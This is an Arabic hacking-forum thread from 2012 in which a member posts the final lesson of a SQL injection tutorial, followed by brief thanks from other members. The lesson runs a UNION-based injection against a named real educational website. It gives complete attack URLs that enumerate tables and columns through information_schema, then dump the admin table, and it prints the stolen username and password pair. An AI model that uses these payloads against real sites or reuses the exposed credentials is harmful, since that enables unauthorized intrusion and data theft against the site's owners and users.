يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-06-2012, 10:25 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية jasem1
 

 

 
إحصائية العضو






jasem1 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
jasem1 is on a distinguished road

افتراضي تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثالثه والاخيره


السلام عليكم ورحمة الله وبركاته
المرحله الاخيره في استغلال ثغرة sql injaction
====================
الشرح مقدم لأاخي هيثم وباقي اعضاء المنتدى الاكارم
=================
بسم الله الرحمن الرحيم
كنا قد تناولنا بدرس الامس استغلال الامر
كود:
union+select
والموقع الذي كنا نتدرب عليه هو التالي :
كود:
dsasummercamp.edu.gr/news.php?id=123
وهو موقع الماني ....حكومي مصاب بثغرة سيكول ...واظهرنا عدد الجداول المصابه وهي 5 جداول ..وطبقنا امر استخراج اسم القااعده واصدارها واسم المستخدم او اليوزرنيم لهذه القاعده

ظهر معنا باستخدام هذا الموقع ان اصدار قاعدته هو 5.1.63
ولنتعلم شيء يا شباب وهو ان كل قاعده يبدا اصدارها بالرقم 5 تحتوي على قاعده اضافيه يسجل فيها معلومات الدوخول الخاصه بالادمن ومنها كلمة سره وايميله واسم المستخدم الخاص به
طيب كيف ..! هذا ما سنشاهده ونتعرف عليه الان
اولا علي ان استخدم امر لرؤية محتوى هذه القاعده التي يحبها محترفو الهكر ويحبون التعامل معها
الان ركزوا معي سنضع هذا الامر مكان العمود المصاب
كود:
Group_concat(table_name)
وهذه الجمله تعني مجموعة الجداول

ثم بعد ترقيم الاعداد نستخدم هذا الامر :
كود:
+From+information_schema.tables+where+table_schema=database()
حسننا .سأوضح
عندما نضع امر
كود:
Group_concat(table_name)
كأننا نقول للقاعده اظهري مجموعة الجدوال
وعندما كتبنا الامر:
كود:
+From+information_schema.tables+where+table_schema=database()
اي اننا نقول للقاعده : من جداول القاعدة الاحتياطيه
وكلمة information تعني : معلومات
وكلمةschema تعني :احتياطيه
وكلمة from تعني من
وكلمةtable تعني جدول

حيث سيصبح الرابط على الشكل التالي :
كود:
http://dsasummercamp.edu.gr/news.php?id=-123+union+select+1,Group_concat%28table_name%29,3,4,5+From+information_schema.tables+where+table_schema=database%28%29
ظهرت الجداول ويفصل بينها فاصله صغيره
انظروا هذه هي الجداول :
كود:
auth,categories,files_en,files_gr,intros_en,intros_gr,issue_contents_en,issue_contents_gr,link_categories,links,news_en,news_gr,pg,pg_categ,pg_photos,templates
يا سلام شيء جميل
اين جدول الادمن ؟؟؟

انظروا لا يوجد جدول فيه كلمة ادمن وهذا نادر جدا
طيب كل له اسم يدل على محتواه مثلا :
هذا files_en ملفات انكليزيه
وهذا files_gr ملفات المانيه
وهذا للقوالب templates
وهذا للاخبار news_gr
وهذاlinks للروابط
طيب ماذا لو اردت ان اعرف محتوى هذا الجدول والذي اسمه
auth

يجب اولا ان اذهب لأي موقع تشفير لكي يشفر لي هذا الجدول

اليكم هذا الموقع
http://www.swingnote.com/tools/texttohex.php

انا قمت بتشفير الكلمه واصبحت على الشكل التالي

61757468
لكن اذا اردنا ان نستخدم اي كلمه مشفره بالhex يجب ان نضع قبلها علامة 0x

لما شفرنا هذه الكلمه او هذا الجدول الجواب لأننا سوف نقرأ ما بداخله من عواميد ....
كيف ؟!! تعالوا نعرف
اولا بدل العمود المصاب
نضع
كود:
Group_concat(column_name)
بدل الامر :
كود:
Group_concat(table_name)
ثم الامر :
كود:
+From+information_schema.columns+where+table_name=0xالجدول مشفرا
يعني الرابط يصبح كالتالي :
كود:
http://dsasummercamp.edu.gr/news.php?id=-123+union+select+1,Group_concat%28column_name%29,3,4,5+From+information_schema.columns+where+table_name=0x61757468
والنتيجه انظروا هذه الاعمده
كود:
id,onoma,username,pass,type,published

انظر الصورة

طيب والان علي ان اقرأ محتوى هذه العواميد
ودفعه واحد كيف ؟
كيف!!
سأضع هذه الجداول في الامر
كود:
 concat()
او
كود:
group-concat()
وسأضع بين القوسين
اي عمود اريده من هذه الاعمده التي حصلت عليها وهي :

كود:
id,onoma,username,pass,type,published
وافصل بينها بالعلامه
كود:
0x3a3a
وهي علامة مشفره بالهيك..س
وتعني :
كود:
::
هل ما زلتم تتذكرون اسم الجدول الذي شفرناه بالهيك..س
لقد كان
auth
واسم القاعده كان :
itis_dsa

حسننا كيف سنرتب ذلك وكيف سيكون الامر
سنضع الاعمده التي نريدها مكان العمود المصاب وما يهمني هو عمود PASS و USERNAME
وعليه سيكونان هكذا
كود:
concat(username,0x3a3a,pass)
ثم سأضع اخر الرابط عبارة
كود:
+
from
+
اسم القاعده
.
الجدول
--
طيب تعالوا نطبق عمليا كيف يكون الرابط
كود:
http://dsasummercamp.edu.gr/news.php?id=-123+union+select+1,concat%28username,0x3a3a,pass%29,3,4,5+From+itis_dsa.auth--
والنتيجه كما ظهرت امامكم
هذه هي تم قراءة العمود
كود:
thecube::pelopidas
وهكذا اتتمت المدخل لهذه الثغره وهذه الدروس الثلاثه تعد مرجعا بسيطا لكل راغب
في احتراف هذه الثغرة و اود ان اقول لكم ان هناك اشياء كثيره
لكن هذه هي الاساسيات واتمنى ان تشاهدوا ووتوغلوا اكثر في شروحات الاخوة المحترفين

لكم تحياة اخوكمthe punisher
انتهى الدرس الذي اخذ من وقتي ساعتين ونصف وها هوا الاذان يرفع في السماء مشيرا لموعد صلاة العشاء استودعكم الله



jtqg dh hod Hitham avp gh;jaht hgeyvmsql>>>hglvpgm hgehgei

   

رد مع اقتباس
قديم 07-06-2012, 10:38 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية aircrack -ng
 

 

 
إحصائية العضو







aircrack -ng غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 21
aircrack -ng is on a distinguished road

افتراضي رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثالثه والاخيره


باراك الله فيك
موفق باذن الله

التوقيع

الموت ياتي بغته والقبر صندوق العمل


http://www.tvquran.com/


(من تواضع لله رفع)



vbspiders team

 

   

رد مع اقتباس
قديم 07-06-2012, 10:43 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
Mezo Shams
:: حبيبي يا رسول الله ::
 
الصورة الرمزية Mezo Shams
 

 

 
إحصائية العضو






Mezo Shams غير متواجد حالياً

إرسال رسالة عبر MSN إلى Mezo Shams إرسال رسالة عبر Yahoo إلى Mezo Shams

 

 

إحصائية الترشيح

عدد النقاط : 10
Mezo Shams is on a distinguished road

افتراضي رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثالثه والاخيره


تسلم يا غالى بالتوفيق

التوقيع

http://www14.0zz0.com/2012/06/26/23/132386288.gif
مبتدا فى هكر المواقع
هكر بالحق sql
الميل:ikasnofa@hotmail.com

 

   

رد مع اقتباس
قديم 07-06-2012, 11:01 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية WoLF 305
 

 

 
إحصائية العضو





WoLF 305 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
WoLF 305 is on a distinguished road

افتراضي رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثالثه والاخيره


يعطيك الف عافية يالغالي

تم تقييمك

   

رد مع اقتباس
قديم 07-09-2012, 01:52 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية jasem1
 

 

 
إحصائية العضو






jasem1 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
jasem1 is on a distinguished road

افتراضي رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثالثه والاخيره


اهلا وسهلا بالشباب .....شكرا لمروركم الكريم ...وفقكم الله

   

رد مع اقتباس
قديم 07-22-2012, 06:05 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.Kay_dz
 

 

 
إحصائية العضو







Dr.Kay_dz غير متواجد حالياً

إرسال رسالة عبر MSN إلى Dr.Kay_dz

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.Kay_dz is on a distinguished road

افتراضي رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثالثه والاخيره


باراك الله فيك

التوقيع

"اللهم إغفر لنا ذنوبنا وإسرافنا فى أمرنا وثبت أقدامنا وانصرنا على القوم الكافرين"
xhj@hotmail.fr

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 10:52 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0